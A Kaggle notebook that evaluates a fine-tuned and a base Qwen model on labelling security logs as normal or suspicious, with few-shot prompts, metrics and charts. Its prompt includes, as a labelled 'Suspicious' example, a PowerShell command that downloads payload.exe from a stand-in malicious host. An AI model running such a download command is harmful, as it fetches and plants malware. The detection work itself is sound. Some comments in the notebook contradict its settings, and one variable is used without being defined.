In [None]:
# Check GPU availability
!nvidia-smi

In [None]:
# Install required packages
print("üì¶ Installing dependencies...")
!pip install -q transformers datasets accelerate peft tqdm pandas numpy scikit-learn matplotlib seaborn
print("‚úÖ Dependencies installed!")

In [None]:
# Configuration
import os

# Kaggle paths - UPDATE THESE based on your uploaded dataset names
MODEL_PATH = "/kaggle/input/mitre-fine-tuned-model"  # Your uploaded model dataset
DATA_PATH = "/kaggle/input/mitre-datset"  # Your test data dataset
TEST_FILE = f"{DATA_PATH}/test.jsonl"

# Evaluation settings
EVAL_LIMIT = 5  # FIXED: Increased from 2 to 100 for meaningful results
MAX_NEW_TOKENS = 512  # FIXED: Increased from 256 for longer responses

print("‚úÖ Configuration loaded")
print(f"   Model: {MODEL_PATH}")
print(f"   Test data: {TEST_FILE}")
print(f"   Evaluation limit: {EVAL_LIMIT if EVAL_LIMIT else 'Full dataset'}")

# Verify paths exist
if os.path.exists(MODEL_PATH):
    print(f"‚úÖ Model found: {len(os.listdir(MODEL_PATH))} files")
else:
    print(f"‚ùå Model not found at {MODEL_PATH}")
    print("   Please upload your fine_tuned_model as a Kaggle dataset")

if os.path.exists(TEST_FILE):
    print(f"‚úÖ Test file found")
else:
    print(f"‚ùå Test file not found at {TEST_FILE}")
    print("   Please add your test dataset to Kaggle")

In [None]:
# Load the fine-tuned model
print("üîÑ Loading fine-tuned model...\n")

from transformers import AutoModelForCausalLM, AutoTokenizer
import torch

model = AutoModelForCausalLM.from_pretrained(
    MODEL_PATH,
    torch_dtype=torch.float16,
    device_map="auto",
    trust_remote_code=True
)

tokenizer = AutoTokenizer.from_pretrained(MODEL_PATH, trust_remote_code=True)
tokenizer.pad_token = tokenizer.eos_token

model.eval()  # Set to evaluation mode

print(f"‚úÖ Model loaded from: {MODEL_PATH}")
print(f"üìä GPU Memory: {torch.cuda.memory_allocated() / 1024**3:.2f} GB")
print(f"üìä Model device: {model.device}")

In [None]:
# Load test dataset
print("üîÑ Loading test dataset...\n")

from datasets import load_dataset

test_dataset = load_dataset('json', data_files={'test': TEST_FILE})['test']

print(f"‚úÖ Test dataset loaded: {len(test_dataset):,} examples")
print(f"\nüìã Dataset columns: {test_dataset.column_names}")
print(f"\nüìã Sample test entry:")
print(f"   Instruction: {test_dataset[0]['instruction'][:100]}...")
print(f"   Input: {test_dataset[0]['input'][:100]}...")
print(f"   Output: {test_dataset[0]['output'][:100]}...")

In [None]:
# TEST BASE MODEL WITH FEW-SHOT PROMPTING
print("üîÑ Loading BASE Qwen2.5-1.5B-Instruct model (not fine-tuned)...\n")

from transformers import AutoModelForCausalLM, AutoTokenizer
import torch
import re
import json

# Load the original base model
base_model = AutoModelForCausalLM.from_pretrained(
    "Qwen/Qwen2.5-1.5B-Instruct",
    torch_dtype=torch.float16,
    device_map="auto",
    trust_remote_code=True
)

base_tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2.5-1.5B-Instruct", trust_remote_code=True)
base_tokenizer.pad_token = base_tokenizer.eos_token

base_model.eval()

print(f"‚úÖ Base model loaded")
print(f"üìä GPU Memory: {torch.cuda.memory_allocated() / 1024**3:.2f} GB\n")

print("="*80)
print("üéØ USING FEW-SHOT PROMPTING (WITH INPUT TRUNCATION)")
print("="*80)
print("Showing the model 2 examples of the exact format we want,")
print("then asking it to classify a new log.\n")

# Get test examples
example = test_dataset[0]

# USE FULL INPUT - NO TRUNCATION!
input_text = example['input']
print(f"‚úÖ Using FULL input: {len(input_text)} chars (no truncation)")

# FEW-SHOT PROMPT: Include 2 examples before the actual test
prompt = f"""You are a cybersecurity analyst. Analyze system logs and determine if they show normal or suspicious activity.

Output format:
Status: Normal OR Status: Suspicious
Reason: Brief explanation

### Example 1:
Input: {{"EventID": 4624, "LogonType": 2, "Account": "user@domain.com", "Workstation": "DESKTOP-123"}}
Response:
Status: Normal
Reason: Standard interactive logon (LogonType 2) from a legitimate user account on a known workstation. No indicators of compromise.

### Example 2:
Input: {{"EventID": 4688, "Process": "powershell.exe", "CommandLine": "Invoke-WebRequest http://malicious.com/payload.exe -OutFile C:\\\\temp\\\\mal.exe", "User": "SYSTEM"}}
Response:
Status: Suspicious
Reason: PowerShell executing under SYSTEM context downloading executable from external site - indicates potential malware download (T1105 - Ingress Tool Transfer).

### Now analyze this log:
Input: {input_text}
Response:
"""

print(f"üìä FULL PROMPT LENGTH: {len(prompt)} characters")
print(f"üìã EXPECTED OUTPUT: {example['output']}\n")

# Tokenize with increased max_length
inputs = base_tokenizer(prompt, return_tensors="pt", truncation=True, max_length=4096)
inputs = {k: v.to(base_model.device) for k, v in inputs.items()}

print(f"üìä After tokenization: {inputs['input_ids'].shape[1]} tokens")

# Check actual token count WITHOUT truncation first
test_tokens = base_tokenizer(prompt, return_tensors="pt", truncation=False)
actual_tokens = test_tokens['input_ids'].shape[1]
print(f"üìä Actual tokens needed: {actual_tokens}")

# Use appropriate max_length (4096, 8192, or 16384)
if actual_tokens <= 4096:
    max_len = 4096
elif actual_tokens <= 8192:
    max_len = 8192
else:
    max_len = 16384

print(f"üìä Using max_length: {max_len}")

# Tokenize with dynamic max_length
inputs = base_tokenizer(prompt, return_tensors="pt", truncation=True, max_length=max_len)
inputs = {k: v.to(base_model.device) for k, v in inputs.items()}

print(f"üìä After tokenization: {inputs['input_ids'].shape[1]} tokens")

if inputs['input_ids'].shape[1] >= max_len:
    print(f"‚ö†Ô∏è WARNING: Prompt was truncated to fit {max_len} tokens!")
    print(f"   Consider using larger max_length or shorter inputs")
else:
    print(f"‚úÖ No truncation - full input preserved!")

# Generate with some randomness for variety
print("\nüöÄ Generating response...")
with torch.no_grad():
    outputs = base_model.generate(
        **inputs,
        max_new_tokens=256,
        temperature=0.7,  # Increased for variety (was 0.1)
        do_sample=True,   # Enable sampling for variety (was False)
        top_p=0.9,        # Nucleus sampling
        pad_token_id=base_tokenizer.eos_token_id
    )
# Decode
generated_text = base_tokenizer.decode(outputs[0][inputs['input_ids'].shape[1]:], skip_special_tokens=True)

print(f"\nü§ñ BASE MODEL PREDICTED:")
print("="*80)
print(generated_text)
print("="*80)

print(f"\nüìä EXPECTED OUTPUT:")
print("="*80)
print(example['output'])
print("="*80)

# Check if it matches format
has_status = bool(re.search(r'Status:\s*(Normal|Suspicious)', generated_text, re.IGNORECASE))
has_reason = 'reason:' in generated_text.lower() or 'reason -' in generated_text.lower()

print(f"\n‚úÖ Format Check:")
print(f"   Contains 'Status: Normal/Suspicious': {has_status}")
print(f"   Contains 'Reason': {has_reason}")

if has_status:
    print("\nüéâ SUCCESS! Base model is now outputting the correct format!")
    print("   You can now run the evaluation cells to test on more examples.")
else:
    print("\n‚ö†Ô∏è Model output doesn't match format.")
    print("   Likely cause: Input was truncated, model didn't see examples or '### Response:' marker")

print(f"\nüí° WHY OUTPUT WAS CONSISTENT BEFORE:")
print(f"   - do_sample=False (greedy decoding) = always picks most likely token")
print(f"   - temperature=0.1 (very low) = minimal randomness")
print(f"   - Truncated input at same point = same output every time")
print(f"\n   NOW USING: do_sample=True, temperature=0.7 for variety")

# Clean up to free memory
del base_model
del base_tokenizer
torch.cuda.empty_cache()
print("\n‚úÖ Base model unloaded to free memory")

In [None]:
# TEST FINE-TUNED MODEL WITH SAME PROMPT AND INPUT
print("üîÑ Testing FINE-TUNED model with same approach as base model...\n")

import re
import json

print("="*80)
print("üéØ TESTING FINE-TUNED MODEL (WITH FEW-SHOT PROMPTING)")
print("="*80)
print("Using the same prompt structure and full input as the base model test.\n")

# Get the same test example
example = test_dataset[0]

# USE FULL INPUT - NO TRUNCATION!
input_text = example['input']
print(f"‚úÖ Using FULL input: {len(input_text)} chars (no truncation)")

# FEW-SHOT PROMPT: Same as base model test
prompt = f"""You are a cybersecurity analyst. Analyze system logs and determine if they show normal or suspicious activity.

Output format:
Status: Normal OR Status: Suspicious
Reason: Brief explanation

### Example 1:
Input: {{"EventID": 4624, "LogonType": 2, "Account": "user@domain.com", "Workstation": "DESKTOP-123"}}
Response:
Status: Normal
Reason: Standard interactive logon (LogonType 2) from a legitimate user account on a known workstation. No indicators of compromise.

### Example 2:
Input: {{"EventID": 4688, "Process": "powershell.exe", "CommandLine": "Invoke-WebRequest http://malicious.com/payload.exe -OutFile C:\\\\temp\\\\mal.exe", "User": "SYSTEM"}}
Response:
Status: Suspicious
Reason: PowerShell executing under SYSTEM context downloading executable from external site - indicates potential malware download (T1105 - Ingress Tool Transfer).

### Now analyze this log:
Input: {input_text}
Response:
"""

print(f"üìä FULL PROMPT LENGTH: {len(prompt)} characters")
print(f"üìã EXPECTED OUTPUT: {example['output']}\n")

# Check actual token count WITHOUT truncation first
test_tokens = tokenizer(prompt, return_tensors="pt", truncation=False)
actual_tokens = test_tokens['input_ids'].shape[1]
print(f"üìä Actual tokens needed: {actual_tokens}")

# Use appropriate max_length (4096, 8192, or 16384)
if actual_tokens <= 4096:
    max_len = 4096
elif actual_tokens <= 8192:
    max_len = 8192
else:
    max_len = 16384

print(f"üìä Using max_length: {max_len}")

# Tokenize with dynamic max_length
inputs = tokenizer(prompt, return_tensors="pt", truncation=True, max_length=max_len)
inputs = {k: v.to(model.device) for k, v in inputs.items()}

print(f"üìä After tokenization: {inputs['input_ids'].shape[1]} tokens")

if inputs['input_ids'].shape[1] >= max_len:
    print(f"‚ö†Ô∏è WARNING: Prompt was truncated to fit {max_len} tokens!")
    print(f"   Consider using larger max_length or shorter inputs")
else:
    print(f"‚úÖ No truncation - full input preserved!")

# Generate with same parameters as base model
print("\nüöÄ Generating response with FINE-TUNED model...")
with torch.no_grad():
    outputs = model.generate(
        **inputs,
        max_new_tokens=256,
        temperature=0.7,
        do_sample=True,
        top_p=0.9,
        pad_token_id=tokenizer.eos_token_id
    )

# Decode
generated_text = tokenizer.decode(outputs[0][inputs['input_ids'].shape[1]:], skip_special_tokens=True)

print(f"\nü§ñ FINE-TUNED MODEL PREDICTED:")
print("="*80)
print(generated_text)
print("="*80)

print(f"\nüìä EXPECTED OUTPUT:")
print("="*80)
print(example['output'])
print("="*80)

# Check if it matches format
has_status = bool(re.search(r'Status:\s*(Normal|Suspicious)', generated_text, re.IGNORECASE))
has_reason = 'reason:' in generated_text.lower() or 'reason -' in generated_text.lower()

print(f"\n‚úÖ Format Check:")
print(f"   Contains 'Status: Normal/Suspicious': {has_status}")
print(f"   Contains 'Reason': {has_reason}")

if has_status:
    print("\nüéâ SUCCESS! Fine-tuned model is outputting the correct format!")
    print("   The model has learned the task properly.")
else:
    print("\n‚ö†Ô∏è Model output doesn't match expected format.")
    print("   This suggests the model needs retraining with proper parameters.")
    print("   Recommendation: Retrain with MAX_LENGTH=8192, 5 epochs")

# Compare with base model results
print(f"\nüí° COMPARISON:")
print(f"   Fine-tuned model was trained with MAX_LENGTH={512} (original)")
print(f"   Current input needs: {actual_tokens} tokens")
print(f"   If output is gibberish, model needs retraining with MAX_LENGTH=8192")


In [None]:
# Define evaluation functions with FEW-SHOT PROMPTING and INPUT TRUNCATION
print("üîÑ Defining evaluation functions with few-shot prompting...\n")

def generate_response(model, tokenizer, instruction, input_text, max_new_tokens=512):
    """Generate a response using few-shot prompting to guide format."""
    
    # TRUNCATE INPUT IF TOO LONG
    MAX_INPUT_CHARS = 6000  # Conservative limit to fit examples + prompt
    
    if len(input_text) > MAX_INPUT_CHARS:
        input_text = input_text[:MAX_INPUT_CHARS] + "... [truncated]"
    
    # FEW-SHOT PROMPT: Include examples to guide the model
    prompt = f"""You are a cybersecurity analyst. Analyze system logs and determine if they show normal or suspicious activity.

Output format:
Status: Normal OR Status: Suspicious
Reason: Brief explanation

### Example 1:
Input: {{"EventID": 4624, "LogonType": 2, "Account": "user@domain.com", "Workstation": "DESKTOP-123"}}
Response:
Status: Normal
Reason: Standard interactive logon (LogonType 2) from a legitimate user account on a known workstation. No indicators of compromise.

### Example 2:
Input: {{"EventID": 4688, "Process": "powershell.exe", "CommandLine": "Invoke-WebRequest http://malicious.com/payload.exe -OutFile C:\\\\temp\\\\mal.exe", "User": "SYSTEM"}}
Response:
Status: Suspicious
Reason: PowerShell executing under SYSTEM context downloading executable from external site - indicates potential malware download (T1105 - Ingress Tool Transfer).

### Now analyze this log:
Input: {input_text}
Response:
"""
    
    # Tokenize with max_length to prevent truncation issues
    inputs = tokenizer(prompt, return_tensors="pt", truncation=True, max_length=3072)
    inputs = {k: v.to(model.device) for k, v in inputs.items()}
    
    with torch.no_grad():
        outputs = model.generate(
            **inputs,
            max_new_tokens=max_new_tokens,
            temperature=0.7,  # Some randomness for variety
            do_sample=True,   # Enable sampling
            top_p=0.9,
            pad_token_id=tokenizer.eos_token_id
        )
    
    # Decode only the generated part (remove the prompt)
    generated_text = tokenizer.decode(outputs[0][inputs['input_ids'].shape[1]:], skip_special_tokens=True)
    return generated_text.strip()

# FIXED: Better label extraction for status classification
def extract_status_label(text):
    """Extract Normal/Suspicious/Unknown from model output"""
    text_lower = text.lower()
    if 'status: normal' in text_lower or 'status:normal' in text_lower:
        return 'NORMAL'
    elif 'status: suspicious' in text_lower or 'status:suspicious' in text_lower:
        return 'SUSPICIOUS'
    else:
        return 'UNKNOWN'

def extract_technique_id(text):
    """Extract MITRE technique ID from text (e.g., T1234, T1234.001)"""
    import re
    match = re.search(r'T\d{4}(?:\.\d{3})?', text.upper())
    return match.group(0) if match else None

def calculate_exact_match(pred, target):
    """Calculate exact match accuracy."""
    return 1.0 if pred.strip().lower() == target.strip().lower() else 0.0

def calculate_partial_match(pred, target):
    """Calculate partial match (keyword overlap)."""
    pred_lower = pred.strip().lower()
    target_lower = target.strip().lower()
    
    # Check if major keywords from target appear in prediction
    target_words = set(target_lower.split())
    pred_words = set(pred_lower.split())
    
    if len(target_words) == 0:
        return 0.0
    
    overlap = len(target_words.intersection(pred_words))
    return overlap / len(target_words)

def calculate_f1_score(pred, target):
    """Calculate F1 score based on word overlap."""
    pred_words = set(pred.strip().lower().split())
    target_words = set(target.strip().lower().split())
    
    if len(pred_words) == 0 or len(target_words) == 0:
        return 0.0
    
    overlap = len(pred_words.intersection(target_words))
    
    precision = overlap / len(pred_words) if len(pred_words) > 0 else 0.0
    recall = overlap / len(target_words) if len(target_words) > 0 else 0.0
    
    if precision + recall == 0:
        return 0.0
    
    f1 = 2 * (precision * recall) / (precision + recall)
    return f1

print("‚úÖ Evaluation functions defined with few-shot prompting")
print("   üìä Input truncated to 6000 chars to fit within token limits")
print("   üìä max_length=3072 tokens (examples + truncated input + response)")
print("   üìä Using temperature=0.7, do_sample=True for variety")


In [None]:
# Run evaluation
print("üöÄ Running evaluation on test set...\n")

from tqdm import tqdm
import time

# Determine sample size
if EVAL_LIMIT is None:
    eval_samples = test_dataset
    print(f"Evaluating on FULL test set: {len(eval_samples):,} examples")
else:
    eval_samples = test_dataset.select(range(min(EVAL_LIMIT, len(test_dataset))))
    print(f"Evaluating on LIMITED test set: {len(eval_samples):,} examples (out of {len(test_dataset):,})")

print(f"This may take a while...\n")

results = []
exact_matches = 0
partial_match_scores = []
f1_scores = []

start_time = time.time()

for i, example in enumerate(tqdm(eval_samples, desc="Evaluating")):
    # Generate prediction
    prediction = generate_response(
        model,
        tokenizer,
        example['instruction'],
        example['input'],
        max_new_tokens=MAX_NEW_TOKENS
    )
    
    # Calculate metrics
    exact_match = calculate_exact_match(prediction, example['output'])
    partial_match = calculate_partial_match(prediction, example['output'])
    f1 = calculate_f1_score(prediction, example['output'])
    
    exact_matches += exact_match
    partial_match_scores.append(partial_match)
    f1_scores.append(f1)
    
    # Store result
    results.append({
        'index': i,
        'instruction': example['instruction'],
        'input': example['input'],
        'expected': example['output'],
        'predicted': prediction,
        'exact_match': exact_match,
        'partial_match': partial_match,
        'f1_score': f1
    })
    
    # Show first 10 examples (FIXED: increased from 5)
    if i < 10:
        print(f"\n{'='*80}")
        print(f"Example {i+1}:")
        print(f"Instruction: {example['instruction'][:80]}...")
        print(f"Input: {example['input'][:80]}...")
        print(f"Expected: {example['output'][:200]}...")
        print(f"Predicted: {prediction[:200]}...")
        print(f"Metrics: Exact={exact_match}, Partial={partial_match:.2f}, F1={f1:.2f}")

elapsed = time.time() - start_time

print(f"\n{'='*80}")
print(f"‚úÖ Evaluation completed in {elapsed/60:.2f} minutes ({elapsed/len(eval_samples):.2f} sec/example)")

In [None]:
# TOKEN USAGE STATISTICS
print("\n" + "="*80)
print("üìä TOKEN USAGE STATISTICS (FULL INPUT)")
print("="*80 + "\n")

if token_stats:
    import numpy as np
    
    actual_tokens_list = [s['actual_tokens'] for s in token_stats]
    max_lengths_used = [s['max_length_used'] for s in token_stats]
    truncated_count = sum(1 for s in token_stats if s['truncated'])
    
    print(f"Total examples processed: {len(token_stats)}")
    print(f"\nüìà Token Count Statistics (Input + Few-shot Examples):")
    print(f"   Min tokens:     {min(actual_tokens_list):,}")
    print(f"   Max tokens:     {max(actual_tokens_list):,}")
    print(f"   Average tokens: {np.mean(actual_tokens_list):,.0f}")
    print(f"   Median tokens:  {np.median(actual_tokens_list):,.0f}")
    
    print(f"\nüìä Max Length Distribution:")
    max_len_4096 = sum(1 for ml in max_lengths_used if ml == 4096)
    max_len_8192 = sum(1 for ml in max_lengths_used if ml == 8192)
    max_len_16384 = sum(1 for ml in max_lengths_used if ml == 16384)
    
    print(f"   Used 4096:  {max_len_4096} examples ({max_len_4096/len(token_stats)*100:.1f}%)")
    print(f"   Used 8192:  {max_len_8192} examples ({max_len_8192/len(token_stats)*100:.1f}%)")
    print(f"   Used 16384: {max_len_16384} examples ({max_len_16384/len(token_stats)*100:.1f}%)")
    
    if truncated_count > 0:
        print(f"\n‚ö†Ô∏è WARNING: {truncated_count} examples were truncated!")
        print(f"   Consider using an even larger max_length or shorter inputs")
    else:
        print(f"\n‚úÖ No truncation occurred - all inputs fit within max_length limits")
    
    # Recommendation for training
    recommended_max_length = max(actual_tokens_list)
    # Round up to next power of 2 for efficiency
    import math
    recommended_max_length = 2 ** math.ceil(math.log2(recommended_max_length))
    
    print(f"\nüí° RECOMMENDATION FOR TRAINING:")
    print(f"   For training, use MAX_LENGTH = {recommended_max_length} to fit all examples")
    print(f"   This ensures no data loss during fine-tuning")
else:
    print("‚ö†Ô∏è No token statistics collected yet - run evaluation first!")

print("="*80)


In [None]:
# Calculate comprehensive metrics - FIXED VERSION
print("\n" + "="*80)
print("üìä CALCULATING COMPREHENSIVE METRICS")
print("="*80 + "\n")

import numpy as np
from sklearn.metrics import (
    accuracy_score, 
    precision_score, 
    recall_score, 
    f1_score, 
    confusion_matrix,
    classification_report
)
import pandas as pd
from collections import Counter

# FIXED: Extract status labels (Normal/Suspicious) instead of just MITRE IDs
y_true_status = [extract_status_label(r['expected']) for r in results]
y_pred_status = [extract_status_label(r['predicted']) for r in results]

print("="*80)
print("üéØ STATUS CLASSIFICATION METRICS (Normal vs Suspicious)")
print("="*80 + "\n")

# Get unique status labels
unique_status_labels = sorted(list(set(y_true_status + y_pred_status)))
print(f"üìã Status labels found: {unique_status_labels}\n")

# Print label distribution
print(f"Expected label distribution:")
print(f"  {Counter(y_true_status)}\n")
print(f"Predicted label distribution:")
print(f"  {Counter(y_pred_status)}\n")

# Calculate status classification metrics
status_accuracy = accuracy_score(y_true_status, y_pred_status)
status_precision_macro = precision_score(y_true_status, y_pred_status, average='macro', zero_division=0)
status_precision_weighted = precision_score(y_true_status, y_pred_status, average='weighted', zero_division=0)
status_recall_macro = recall_score(y_true_status, y_pred_status, average='macro', zero_division=0)
status_recall_weighted = recall_score(y_true_status, y_pred_status, average='weighted', zero_division=0)
status_f1_macro = f1_score(y_true_status, y_pred_status, average='macro', zero_division=0)
status_f1_weighted = f1_score(y_true_status, y_pred_status, average='weighted', zero_division=0)

print("üéØ STATUS CLASSIFICATION OVERALL METRICS:")
print(f"   Accuracy:             {status_accuracy:.4f} ({status_accuracy*100:.2f}%)")
print(f"\n   Precision (Macro):    {status_precision_macro:.4f}")
print(f"   Precision (Weighted): {status_precision_weighted:.4f}")
print(f"\n   Recall (Macro):       {status_recall_macro:.4f}")
print(f"   Recall (Weighted):    {status_recall_weighted:.4f}")
print(f"\n   F1-Score (Macro):     {status_f1_macro:.4f}")
print(f"   F1-Score (Weighted):  {status_f1_weighted:.4f}")

# Detailed classification report
print(f"\nüìä DETAILED STATUS CLASSIFICATION REPORT:")
print(classification_report(y_true_status, y_pred_status, zero_division=0))

# Status confusion matrix
status_conf_matrix = confusion_matrix(y_true_status, y_pred_status, labels=unique_status_labels)

# Calculate word-level metrics (from previous evaluation)
avg_partial_match = np.mean(partial_match_scores)
avg_f1_word = np.mean(f1_scores)
exact_match_accuracy = exact_matches / len(eval_samples)

print(f"\n" + "="*80)
print("üìù WORD-LEVEL SIMILARITY METRICS:")
print("="*80)
print(f"   Exact Match Accuracy: {exact_match_accuracy:.4f} ({exact_match_accuracy*100:.2f}%)")
print(f"   Avg Partial Match:    {avg_partial_match:.4f}")
print(f"   Avg F1 (Word-level):  {avg_f1_word:.4f}")

# Store metrics for later use
accuracy = status_accuracy
precision_macro = status_precision_macro
precision_weighted = status_precision_weighted
recall_macro = status_recall_macro
recall_weighted = status_recall_weighted
f1_macro = status_f1_macro
f1_weighted = status_f1_weighted
unique_labels = unique_status_labels
conf_matrix = status_conf_matrix
y_true = y_true_status
y_pred = y_pred_status

print(f"\n‚úÖ Metrics calculated successfully!")

In [None]:
# INSPECTION: Manual review of predictions
print("\n" + "="*80)
print("üîç MANUAL INSPECTION OF PREDICTIONS")
print("="*80 + "\n")

print("This helps you see what the model is actually generating.\n")

# Analyze all predictions first
unknown_count = sum(1 for r in results if extract_status_label(r['predicted']) == 'UNKNOWN')
normal_count = sum(1 for r in results if extract_status_label(r['predicted']) == 'NORMAL')
suspicious_count = sum(1 for r in results if extract_status_label(r['predicted']) == 'SUSPICIOUS')

print("="*80)
print("‚ö†Ô∏è MODEL OUTPUT ANALYSIS")
print("="*80)
print(f"Total predictions: {len(results)}")
print(f"  NORMAL predictions: {normal_count}")
print(f"  SUSPICIOUS predictions: {suspicious_count}")
print(f"  UNKNOWN predictions: {unknown_count}")

if unknown_count > len(results) * 0.5:
    print(f"\nüö® WARNING: {unknown_count}/{len(results)} predictions are UNKNOWN!")
    print("   This means the model is NOT generating the expected format:")
    print("   'Status: Normal' or 'Status: Suspicious'")
    print("\n   The model is likely BROKEN or NOT PROPERLY TRAINED!")
    print("\n   Common causes:")
    print("   1. Model didn't learn the task (too few epochs, wrong data)")
    print("   2. Input is being truncated (logs too long for 512 tokens)")
    print("   3. Generation parameters are wrong")
    print("   4. Prompt format mismatch between training and evaluation")
print("="*80 + "\n")

# Show 5 examples - prioritize showing broken ones first
broken_indices = [i for i, r in enumerate(results) if extract_status_label(r['predicted']) == 'UNKNOWN']
working_indices = [i for i, r in enumerate(results) if extract_status_label(r['predicted']) != 'UNKNOWN']

import random
random.seed(42)

if broken_indices:
    sample_indices = broken_indices[:3]  # Show 3 broken examples
    if working_indices:
        sample_indices += random.sample(working_indices, min(2, len(working_indices)))  # Add 2 working ones if any
else:
    sample_indices = random.sample(range(len(results)), min(5, len(results)))

for idx in sample_indices:
    result = results[idx]
    pred_status = extract_status_label(result['predicted'])
    exp_status = extract_status_label(result['expected'])
    
    print(f"\n{'='*80}")
    print(f"Example {idx + 1}:")
    
    print(f"\nüìù EXPECTED OUTPUT:")
    print(f"{result['expected']}")
    
    print(f"\nü§ñ MODEL PREDICTED:")
    if len(result['predicted']) > 500:
        print(f"{result['predicted'][:500]}... [TRUNCATED - {len(result['predicted'])} chars total]")
    else:
        print(f"{result['predicted']}")
    
    print(f"\nüìä STATUS: Expected={exp_status}, Predicted={pred_status}")
    print(f"‚úì Match: {exp_status == pred_status}")
    
    if pred_status == 'UNKNOWN':
        print("\n‚ö†Ô∏è BROKEN: Model output doesn't contain 'Status:' - model is not working!")

print(f"\n{'='*80}")
print("üí° DIAGNOSTIC TIPS:")
print("   - Is the model following the expected format?")
print("   - Is it correctly identifying Normal vs Suspicious?")
print("   - Are the reasons/explanations coherent?")
print("\n   If most predictions are UNKNOWN:")
print("   ‚Üí Model needs retraining with more epochs or better parameters")
print("   ‚Üí Check if prompt format matches training format")
print("   ‚Üí Try increasing max_length from 512 to 1024 or 2048")
print("="*80)

In [None]:
# Final Summary Report
print("\n" + "="*80)
print("üéâ FINAL EVALUATION SUMMARY")
print("="*80 + "\n")

print(f"üìä Dataset Information:")
print(f"   Total samples evaluated: {len(eval_samples):,}")
print(f"   Evaluation time: {elapsed/60:.2f} minutes")
print(f"   Time per sample: {elapsed/len(eval_samples):.2f} seconds")

print(f"\nüéØ Key Performance Metrics:")
print(f"   ‚úì Overall Accuracy: {accuracy:.4f} ({accuracy*100:.2f}%)")
print(f"   ‚úì Weighted Precision: {precision_weighted:.4f}")
print(f"   ‚úì Weighted Recall: {recall_weighted:.4f}")
print(f"   ‚úì Weighted F1-Score: {f1_weighted:.4f}")

print(f"\n{'='*80}")
print("‚úÖ Evaluation Complete!")
print("="*80)

In [None]:
# Save results to CSV
print("üíæ Saving detailed results...\n")

# Create detailed results DataFrame
results_df = pd.DataFrame(results)
results_df['true_label'] = y_true
results_df['predicted_label'] = y_pred
results_df['correct'] = results_df['true_label'] == results_df['predicted_label']

# Save to CSV
output_file = 'evaluation_results.csv'
results_df.to_csv(output_file, index=False)
print(f"‚úÖ Detailed results saved to: {output_file}")

# Create metrics summary
metrics_summary = {
    'Metric': [
        'Accuracy',
        'Precision (Macro)',
        'Precision (Weighted)',
        'Recall (Macro)',
        'Recall (Weighted)',
        'F1-Score (Macro)',
        'F1-Score (Weighted)',
        'Exact Match Accuracy',
        'Avg Partial Match',
        'Avg F1 (Word-level)'
    ],
    'Score': [
        accuracy,
        precision_macro,
        precision_weighted,
        recall_macro,
        recall_weighted,
        f1_macro,
        f1_weighted,
        exact_match_accuracy,
        avg_partial_match,
        avg_f1_word
    ]
}

metrics_df = pd.DataFrame(metrics_summary)
metrics_file = 'metrics_summary.csv'
metrics_df.to_csv(metrics_file, index=False)
print(f"‚úÖ Metrics summary saved to: {metrics_file}")

# Show sample of results
print("\nüìã Sample Results (First 10):")
display_cols = ['instruction', 'true_label', 'predicted_label', 'correct', 'f1_score']
print(results_df[display_cols].head(10).to_string(index=False))

print(f"\nüìä Correct Predictions: {results_df['correct'].sum()} / {len(results_df)} ({accuracy*100:.2f}%)")
print(f"üìä Incorrect Predictions: {(~results_df['correct']).sum()} / {len(results_df)} ({(1-accuracy)*100:.2f}%)")

In [None]:
# Visualize Metrics Comparison
print("üé® Creating metrics visualization...\n")

import matplotlib.pyplot as plt

# Create metrics comparison bar chart
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(16, 6))

# Plot 1: Overall Metrics
metrics_names = ['Accuracy', 'Precision\n(Weighted)', 'Recall\n(Weighted)', 'F1-Score\n(Weighted)']
metrics_values = [accuracy, precision_weighted, recall_weighted, f1_weighted]

bars1 = ax1.bar(metrics_names, metrics_values, color=['#2ecc71', '#3498db', '#e74c3c', '#f39c12'], alpha=0.8)
ax1.set_ylabel('Score', fontsize=12, fontweight='bold')
ax1.set_title('Overall Performance Metrics', fontsize=14, fontweight='bold')
ax1.set_ylim([0, 1])
ax1.axhline(y=0.5, color='gray', linestyle='--', alpha=0.3, label='50% baseline')
ax1.grid(axis='y', alpha=0.3)

# Add value labels on bars
for bar in bars1:
    height = bar.get_height()
    ax1.text(bar.get_x() + bar.get_width()/2., height,
             f'{height:.3f}\n({height*100:.1f}%)',
             ha='center', va='bottom', fontweight='bold')

# Plot 2: Macro vs Weighted Metrics
metrics_comparison = {
    'Precision': [precision_macro, precision_weighted],
    'Recall': [recall_macro, recall_weighted],
    'F1-Score': [f1_macro, f1_weighted]
}

x = np.arange(len(metrics_comparison))
width = 0.35

bars2_1 = ax2.bar(x - width/2, [v[0] for v in metrics_comparison.values()], 
                   width, label='Macro', color='#3498db', alpha=0.8)
bars2_2 = ax2.bar(x + width/2, [v[1] for v in metrics_comparison.values()], 
                   width, label='Weighted', color='#e74c3c', alpha=0.8)

ax2.set_ylabel('Score', fontsize=12, fontweight='bold')
ax2.set_title('Macro vs Weighted Metrics Comparison', fontsize=14, fontweight='bold')
ax2.set_xticks(x)
ax2.set_xticklabels(metrics_comparison.keys())
ax2.set_ylim([0, 1])
ax2.legend()
ax2.grid(axis='y', alpha=0.3)

# Add value labels
for bars in [bars2_1, bars2_2]:
    for bar in bars:
        height = bar.get_height()
        ax2.text(bar.get_x() + bar.get_width()/2., height,
                 f'{height:.3f}',
                 ha='center', va='bottom', fontsize=9)

plt.tight_layout()
plt.show()

print("‚úÖ Metrics visualization created!")

In [None]:
# Detailed Classification Report
print("üìä DETAILED CLASSIFICATION REPORT")
print("="*80 + "\n")

# Generate classification report
report = classification_report(y_true, y_pred, labels=unique_labels, zero_division=0, output_dict=True)
report_df = pd.DataFrame(report).transpose()

# Display full report
print(classification_report(y_true, y_pred, labels=unique_labels, zero_division=0))

# Convert to DataFrame for better visualization
print("\nüìà Per-Class Metrics Summary:")
print(report_df.round(4))

# Show best and worst performing classes
if len(unique_labels) > 5:
    print("\nüèÜ TOP 5 BEST PERFORMING CLASSES (by F1-score):")
    class_metrics = report_df[report_df.index.str.startswith('T')].sort_values('f1-score', ascending=False)
    print(class_metrics.head(5)[['precision', 'recall', 'f1-score', 'support']].round(4))
    
    print("\n‚ö†Ô∏è TOP 5 WORST PERFORMING CLASSES (by F1-score):")
    print(class_metrics.tail(5)[['precision', 'recall', 'f1-score', 'support']].round(4))

In [None]:
# Visualize Confusion Matrix
print("üé® Creating confusion matrix visualization...\n")

import matplotlib.pyplot as plt
import seaborn as sns

# Create figure
fig, ax = plt.subplots(figsize=(max(12, len(unique_labels)), max(10, len(unique_labels))))

